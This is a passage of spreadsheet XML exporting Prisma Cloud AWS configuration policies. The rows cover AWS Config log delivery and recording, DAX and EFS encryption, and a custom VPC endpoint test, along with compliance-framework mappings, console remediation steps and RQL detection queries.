Cybersecurity Maturity Model Certification (CMMC) v.1.02, CHC HITRUST CSF v.9.6.0, NIST CSF v2.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2)</t>
        </is>
      </c>
      <c r="B1603" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1603" s="2" t="inlineStr"/>
      <c r="D1603" t="inlineStr"/>
      <c r="E1603" t="inlineStr"/>
      <c r="F1603" t="inlineStr"/>
      <c r="G1603" t="b">
        <v>0</v>
      </c>
      <c r="H16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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1603" t="inlineStr">
        <is>
          <t>aws-configservice</t>
        </is>
      </c>
      <c r="K1603" t="inlineStr">
        <is>
          <t>AWS Config fails to deliver log files</t>
        </is>
      </c>
      <c r="L1603" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1603" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1603" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1603" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1603" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1603" t="inlineStr">
        <is>
          <t>Control Category: 09.0</t>
        </is>
      </c>
      <c r="R1603" t="inlineStr">
        <is>
          <t>09.aa</t>
        </is>
      </c>
      <c r="S1603" t="inlineStr"/>
      <c r="T1603" t="b">
        <v>0</v>
      </c>
      <c r="U1603" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1603" t="inlineStr">
        <is>
          <t>aws-configservice-describe-configuration-recorders</t>
        </is>
      </c>
      <c r="W1603" t="inlineStr">
        <is>
          <t>This policy identifies AWS Configs which are failing to deliver its log files to the specified S3 bucket. It happens when it doesn't have sufficient permissions to complete the operation. To deliver information to S3 bucket, AWS Config needs to assume an IAM role that manages the permissions required to access the designated S3 bucket.</t>
        </is>
      </c>
      <c r="X1603" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to the AWS Config Dashboard
4. Go to 'Settings' (Left Pane)
5. In 'AWS Config role' section, 'Choose a role from your account' option and provide a unique name for new IAM role for the 'Role name' box; which does have permission to access S3 bucket.
6. Click Save</t>
        </is>
      </c>
      <c r="Y1603" t="inlineStr"/>
      <c r="Z1603" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-configservice-describe-configuration-recorders' AND json.rule = 'status.recording is true and status.lastStatus contains FAILURE'</t>
        </is>
      </c>
      <c r="AA1603" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1603" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1603" t="inlineStr">
        <is>
          <t>PC-AWS-CFG-296</t>
        </is>
      </c>
      <c r="AD1603" t="b">
        <v>1</v>
      </c>
      <c r="AE1603" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1603" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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3" t="inlineStr">
        <is>
          <t>75a95357-3a98-41b9-9367-5d00fb1ab5f1</t>
        </is>
      </c>
      <c r="AI1603" t="inlineStr">
        <is>
          <t>3716b6a1-5d03-4bda-a6e5-d59e3b9949b3</t>
        </is>
      </c>
      <c r="AJ1603" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1603" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1604">
      <c r="A1604" t="inlineStr">
        <is>
          <t>RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, CSA CCM v3.0.1, MLPS 2.0 (Level 2), PCI DSS v4.0, NIST CSF v2.0, jbrox - GDPR, NIST CSF, MLPS 2.0 (Level 2), CDC NIST 800-53 Rev4, ISO 27002:2022, ITSG-33, Australian Energy Sector Cyber Security Framework (AESCSF), NIST CSF v2.0, Fedramp (Moderate), ITSG-33, NIST CSF, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev4, PCI DSS v4.0, PCI DSS v4.0, GDPR, HITRUST CSF v9.3 [Deprecated], TX-RAMP Level 2, ISO 27001:2013, NIST CSF, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, SOC 2, PCI DSS v3.2.1, CIS Controls v8, HITRUST CSF v.11.2.0, GDPR, MLPS 2.0, NIST CSF, CIS Controls v8.1, kfirdaus AWS Account-CS, NIST CSF, CSA CCM v3.0.1, CIS Controls v7.1, CDC NIST 800-53 Rev4, ISO/IEC 27001:2022, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, HITRUST CSF v9.3 [Deprecated], NIST CSF, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, NIST 800-171 Rev1, Telecommunications Security Act - TSA, SOC 2, CSA CCM v3.0.1, NIST CSF, NIST CSF, MAS TRM 2021, HITRUST CSF v9.3 [Deprecated], PCI DSS v4.0, NIST CSF, NIST 800-171 Rev1, NIST 800-171 Rev1, HITRUST CSF v.9.6.0, CDC NIST 800-53 Rev4, NIST 800-171 Rev1, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, Copy of SOC 2, NIST 800-171 Rev1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, SOC 2, ISO 27001:2013, Copy of SOC 2, NIST 800-171 Rev1, NIST 800-53 Rev 5, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 1, TX-RAMP Level 2, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Copy of SOC 2, CSA CCM v4.0.12, NIST SP 800-171 Revision 3, Copy of SOC 2, NIST CSF, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], HITRUST CSF v9.3 [Deprecated], CHC HITRUST CSF v.9.6.0, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, NIST CSF, NIST 800-53 Rev 5, Copy of CIS Controls v8, NIST CSF, CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), PCI DSS v4.0, PCI DSS v4.0, CSA CCM v3.0.1, ISO/IEC 27001:2022, CIS Controls v8, NIST CSF, jbrox - GDPR, NIST 800-171 Rev1, jbrox - GDPR, FFIEC, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, CDC NIST 800-53 Rev4, MLPS 2.0, CHC HITRUST CSF v.9.6.0, Insurance Regulatory And Development Authority Of India, SOC 2, CRI Profile v1.2.1, HITRUST CSF v.11.2.0, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS Controls v7.1, PCI DSS v4.0, SOC 2, SOC 2, NIST CSF v2.0, ITSG-33, MLPS 2.0 (Level 3), NIST 800-53 Rev 5, HIPAA, kfirdaus AWS Account-CS, CDC NIST 800-53 Rev4, CSA CCM v3.0.1, MLPS 2.0 (Level 3), GDPR, kashan ACSC Information Security Manual (ISM), NIST CSF, PCI DSS v4.0, PCI DSS v4.0, NIST CSF, SOC 2, CRI Profile v1.2.1, NIST CSF, CSA CCM v.4.0.6, CRI Profile v2.0, NIST CSF, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), FFIEC, CSA CCM v3.0.1, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, DORA, NIST 800-171 Rev1, CSA CCM v.4.0.6, HITRUST CSF v.9.6.0, NIST 800-53 Rev4, NIST CSF, ISO/IEC 27001:2022, NIST 800-53 Rev4, DORA, NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v3.0.1, NIST 800-53 Rev 5, TX-RAMP Level 2, CSA CCM v3.0.1, PCI DSS v3.2.1, HITRUST CSF v.9.6.0, NIST CSF, NIST 800-53 Rev4, NIST CSF, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CHC HITRUST CSF v.9.6.0, SOC 2, HITRUST CSF v9.3 [Deprecated], CSA CCM v3.0.1, NIST CSF v2.0, HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B1604" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1604" s="2" t="inlineStr"/>
      <c r="D1604" t="inlineStr"/>
      <c r="E1604" t="inlineStr"/>
      <c r="F1604" t="inlineStr"/>
      <c r="G1604" t="b">
        <v>1</v>
      </c>
      <c r="H16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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1604" t="inlineStr">
        <is>
          <t>aws-configservice</t>
        </is>
      </c>
      <c r="K1604" t="inlineStr">
        <is>
          <t>AWS Config must record all possible resources</t>
        </is>
      </c>
      <c r="L1604" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1604" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1604" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1604" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1604" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1604" t="inlineStr">
        <is>
          <t>Control Category: 09.0</t>
        </is>
      </c>
      <c r="R1604" t="inlineStr">
        <is>
          <t>09.aa</t>
        </is>
      </c>
      <c r="S1604" t="inlineStr"/>
      <c r="T1604" t="b">
        <v>0</v>
      </c>
      <c r="U1604" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1604" t="inlineStr">
        <is>
          <t>aws-configservice-describe-configuration-recorders</t>
        </is>
      </c>
      <c r="W1604" t="inlineStr">
        <is>
          <t>This policy identifies resources for which AWS Config recording is enabled but recording for all possible resources are disabled. AWS Config provides an inventory of your AWS resources and a history of configuration changes to these resources. You can use AWS Config to define rules that evaluate these configurations for compliance. Hence, it is important to enable this feature.</t>
        </is>
      </c>
      <c r="X1604" t="inlineStr">
        <is>
          <t>1. Login to the AWS and navigate to the 'Config' service
2. Change to the respective region and in the navigation pane, click on 'Settings'
3. Review the 'All resources' and Check the 2 options (3.a and 3.b)
3.a Record all resources supported in this region
3.b Include global resources (e.g., AWS IAM resources) 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-config-must-record-all-possible-resources
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-config-must-record-all-possible-resources</t>
        </is>
      </c>
      <c r="Y1604" t="inlineStr"/>
      <c r="Z1604" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-configservice-describe-configuration-recorders' AND json.rule = '(status.recording is true and status.lastStatus equals SUCCESS) and (recordingGroup.allSupported is false or recordingGroup.includeGlobalResourceTypes is false)'
{"category":"General","resourceTypes":["aws_config_configuration_recorder"]}</t>
        </is>
      </c>
      <c r="AA1604" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1604" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1604" t="inlineStr">
        <is>
          <t>PC-AWS-CFG-40-CKV2_AWS_48</t>
        </is>
      </c>
      <c r="AD1604" t="b">
        <v>1</v>
      </c>
      <c r="AE1604" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1604" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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4" t="inlineStr">
        <is>
          <t>4c64a4d6-1b96-4004-8a11-f215aa8ee3ce</t>
        </is>
      </c>
      <c r="AI1604" t="inlineStr">
        <is>
          <t>4c64a4d6-1b96-4004-8a11-f215aa8ee3ce</t>
        </is>
      </c>
      <c r="AJ1604" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1604" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1605">
      <c r="A1605" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, ITSG-33, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 2, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B1605" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1605" s="2" t="inlineStr"/>
      <c r="D1605" t="inlineStr"/>
      <c r="E1605" t="inlineStr"/>
      <c r="F1605" t="inlineStr"/>
      <c r="G1605" t="b">
        <v>1</v>
      </c>
      <c r="H16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605" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1605" t="inlineStr">
        <is>
          <t>aws-dax</t>
        </is>
      </c>
      <c r="K1605" t="inlineStr">
        <is>
          <t>AWS DAX cluster not configured with encryption at rest</t>
        </is>
      </c>
      <c r="L1605" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1605" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1605" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1605" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1605" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1605" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R1605" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S1605" t="inlineStr"/>
      <c r="T1605" t="b">
        <v>0</v>
      </c>
      <c r="U1605" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1605" t="inlineStr">
        <is>
          <t>aws-dax-cluster</t>
        </is>
      </c>
      <c r="W1605" t="inlineStr">
        <is>
          <t>This policy identifies the AWS DAX cluster where encryption at rest is disabled.
AWS DAX cluster encryption at rest provides an additional layer of data protection, helping secure your data from unauthorized access to underlying storage. Without encryption, anyone with access to the storage media could potentially intercept and view the data.
It is recommended to enable encryption at rest for the AWS DAX cluster.</t>
        </is>
      </c>
      <c r="X1605" t="inlineStr">
        <is>
          <t>To enable DAX encryption at rest while creating the new DynamoDB cluster, perform the following actions:
1. Sign in to the AWS Management Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated
3. Go to 'DynamoDB' service under the 'Database' section in 'Services' menu
4. In the navigation pane on the left side of the console, under 'DAX', choose 'Clusters'
5. Choose 'Create cluster'
6. For Cluster name , and other configurations set according to your reported DAX cluster
7. On the 'Configure security' panel, In 'Encryption' section, select the checkbox 'Turn on encryption at rest' and Click 'Next'
8. On the 'Verify advanced settings' set according your reported DAX cluster and click 'Next'
9. On the 'Review and create' click 'Create cluster'
Once the new cluster is created, change the cluster endpoint within your DynamoDB application to reference the new resource.
To delete the existing DAX cluster where encryption not enabled
1.  Sign in to the AWS Management Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated
3. Go to 'DynamoDB' service under the 'Database' section in 'Services' menu
4. In the navigation pane on the left side of the console, under 'DAX', choose Clusters
5. Select the DAX cluster that is reported and required to remove
6. Click 'Delete' to delete the cluster 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-23
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-23</t>
        </is>
      </c>
      <c r="Y1605" t="inlineStr"/>
      <c r="Z1605" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-dax-cluster' AND json.rule = Status equals "available" and SSEDescription.Status equals "DISABLED"
{"category":"General","resourceTypes":["aws_dax_cluster"]}</t>
        </is>
      </c>
      <c r="AA1605" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1605" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1605" t="inlineStr">
        <is>
          <t>PC-AWS-DAX-1232-CKV_AWS_47</t>
        </is>
      </c>
      <c r="AD1605" t="b">
        <v>1</v>
      </c>
      <c r="AE1605" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1605" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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05" t="inlineStr">
        <is>
          <t>e8980325-125e-4bcd-a0c8-68838ddab811</t>
        </is>
      </c>
      <c r="AI1605" t="inlineStr">
        <is>
          <t>2e489c95-268e-4cf1-aa98-5ba89635271a</t>
        </is>
      </c>
      <c r="AJ1605" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1605" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1606">
      <c r="A1606" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v.4.0.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, ISO 27002:2022, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, NIST SP 800-172, FFIEC, ISO/IEC 27001:2022, CHC HITRUST CSF v.9.6.0, CIS Controls v8, Risk Management in Technology (RMiT), CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, MLPS 2.0 (Level 2), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, NIST 800-53 Rev 5, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), FFIEC, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Fedramp (Moderate), ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, CRI Profile v1.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST CSF v2.0, Copy of CIS Controls v8, PCI DSS v4.0, NIST 800-53 Rev 5, FFIEC, NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], CyberSecurity Law of the People's Republic of China, jneytchev-fedramp-low, Fedramp (Low), SOC 2, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, Microsoft Cloud Security Benchmark v1, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, PCI DSS v4.0, NIST 800-53 Rev4, NIST CSF v2.0, Telecommunications Security Act - TSA, CDC NIST 800-53 Rev4, MLPS 2.0, NIST 800-53 Rev4, ISO/IEC 27018:2019, CRI Profile v2.0, MAS TRM 2021, CyberSecurity Law of the People's Republic of China, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, DORA, PCI DSS v4.0, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, APRA (CPS 234) Information Security, NIST CSF, NIST SP 800-171 Revision 3, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), PCI DSS v4.0, HIPAA, Fedramp (Moderate), Risk Management in Technology (RMiT), ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, APRA (CPS 234) Information Security, CCPA 2018, MAS TRM 2021, PIPEDA, ISO/IEC 27002:2013, MLPS 2.0 (Level 3), CRI Profile v2.0, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, CyberSecurity Law of the People's Republic of China, CRI Profile v1.2.1, PCI DSS v4.0, NIST SP 800-171 Revision 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v3.2.1, NIST 800-53 Rev 5, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B1606" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1606" s="2" t="inlineStr"/>
      <c r="D1606" t="inlineStr"/>
      <c r="E1606" t="inlineStr"/>
      <c r="F1606" t="inlineStr"/>
      <c r="G1606" t="b">
        <v>0</v>
      </c>
      <c r="H16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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1606" t="inlineStr">
        <is>
          <t>aws-describe</t>
        </is>
      </c>
      <c r="K1606" t="inlineStr">
        <is>
          <t>AWS Elastic File System (EFS) not encrypted using Customer Managed Key</t>
        </is>
      </c>
      <c r="L1606" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M1606" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1606" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1606" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1606" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1606" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R1606" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S1606" t="inlineStr"/>
      <c r="T1606" t="b">
        <v>0</v>
      </c>
      <c r="U1606" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1606" t="inlineStr">
        <is>
          <t>aws-describe-mount-targets</t>
        </is>
      </c>
      <c r="W1606" t="inlineStr">
        <is>
          <t>This policy identifies Elastic File Systems (EFSs) which are encrypted with default KMS keys and not with Keys managed by Customer. It is a best practice to use customer managed KMS Keys to encrypt your EFS data. It gives you full control over the encrypted data.</t>
        </is>
      </c>
      <c r="X1606" t="inlineStr">
        <is>
          <t>AWS EFS Encryption of data at rest can only be enabled during file system creation. So to resolve this alert, create a new EFS with encryption enabled with the customer-managed key, then migrate all required data from the reported EFS to this newly created EFS and delete reported EFS.
To create new EFS with encryption enabled, perform the following:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to EFS dashboard
4. Click on 'File systems' (Left Panel)
5. Click on 'Create file system' button
6. On the 'Configure file system access' step, specify EFS details as per your requirements and Click on 'Next Step'
7. On the 'Configure optional settings' step, Under 'Enable encryption' Choose 'Enable encryption of data at rest' and Select customer managed key [i.e. Other than (default)aws/elasticfilesystem] from 'Select KMS master key' dropdown list along with other parameters and Click on 'Next Step'
8. On the 'Review and create' step, Review all your setting and Click on 'Create File System' button
To delete reported EFS which does not has encryption, perform the following:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to EFS dashboard
4. Click on 'File systems' (Left Panel)
5. Select the reported file system
6. Click on 'Actions' drop-down
7. Click on 'Delete file system'
8. In the 'Permanently delete file system' popup box, To confirm the deletion enter the file system's ID and Click on 'Delete File System'</t>
        </is>
      </c>
      <c r="Y1606" t="inlineStr"/>
      <c r="Z1606" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-describe-mount-targets' AND json.rule = fileSystemDescription.encrypted is true as X; config from cloud.resource where api.name = 'aws-kms-get-key-rotation-status' AND json.rule = keyMetadata.keyManager does not equal CUSTOMER or (keyMetadata.keyManager equals CUSTOMER and keyMetadata.keyState equals Disabled) as Y; filter '$.X.fileSystemDescription.kmsKeyId equals $.Y.key.keyArn'; show X;</t>
        </is>
      </c>
      <c r="AA1606" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1606" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1606" t="inlineStr">
        <is>
          <t>PC-AWS-EFS-314</t>
        </is>
      </c>
      <c r="AD1606" t="b">
        <v>1</v>
      </c>
      <c r="AE1606" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1606" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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6" t="inlineStr">
        <is>
          <t>f7757a77-2c4f-4644-a890-d23122b31175</t>
        </is>
      </c>
      <c r="AI1606" t="inlineStr">
        <is>
          <t>4ae0f4b3-632b-412d-9401-8163a7072c46</t>
        </is>
      </c>
      <c r="AJ1606" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1606" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1607">
      <c r="A1607" t="inlineStr">
        <is>
          <t>CIS v1.4.0 (AWS)</t>
        </is>
      </c>
      <c r="B1607" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1607" s="2" t="inlineStr"/>
      <c r="D1607" t="inlineStr"/>
      <c r="E1607" t="inlineStr"/>
      <c r="F1607" t="inlineStr"/>
      <c r="G1607" t="b">
        <v>0</v>
      </c>
      <c r="H16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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1607" t="inlineStr">
        <is>
          <t>aws-describe</t>
        </is>
      </c>
      <c r="K1607" t="inlineStr">
        <is>
          <t>ranti-USAA-Test</t>
        </is>
      </c>
      <c r="L1607" t="inlineStr"/>
      <c r="M1607" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1607" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1607" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1607" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1607" t="inlineStr">
        <is>
          <t>Monitoring</t>
        </is>
      </c>
      <c r="R1607" t="inlineStr">
        <is>
          <t>4.6</t>
        </is>
      </c>
      <c r="S1607" t="inlineStr">
        <is>
          <t>Resource</t>
        </is>
      </c>
      <c r="T1607" t="b">
        <v>0</v>
      </c>
      <c r="U1607" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1607" t="inlineStr">
        <is>
          <t>aws-describe-vpc-endpoints</t>
        </is>
      </c>
      <c r="W1607" t="inlineStr"/>
      <c r="X1607" t="inlineStr"/>
      <c r="Y1607" t="inlineStr"/>
      <c r="Z1607" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-describe-vpc-endpoints' AND json.rule = serviceName contains "s3" and (ownerId equals "585217285269") or (ownerId equals "169752082276") as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA1607" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1607" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1607" t="inlineStr"/>
      <c r="AD1607" t="b">
        <v>0</v>
      </c>
      <c r="AE1607" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1607" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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7" t="inlineStr">
        <is>
          <t>82ff4a48-5760-4e37-8057-418ffff101f8</t>
        </is>
      </c>
      <c r="AI1607" t="inlineStr">
        <is>
          <t>75b3c28b-ee5a-433e-8e88-20163c8893d2</t>
        </is>
      </c>
      <c r="AJ1607" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1607" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1608">
      <c r="A1608" t="inlineStr">
        <is>
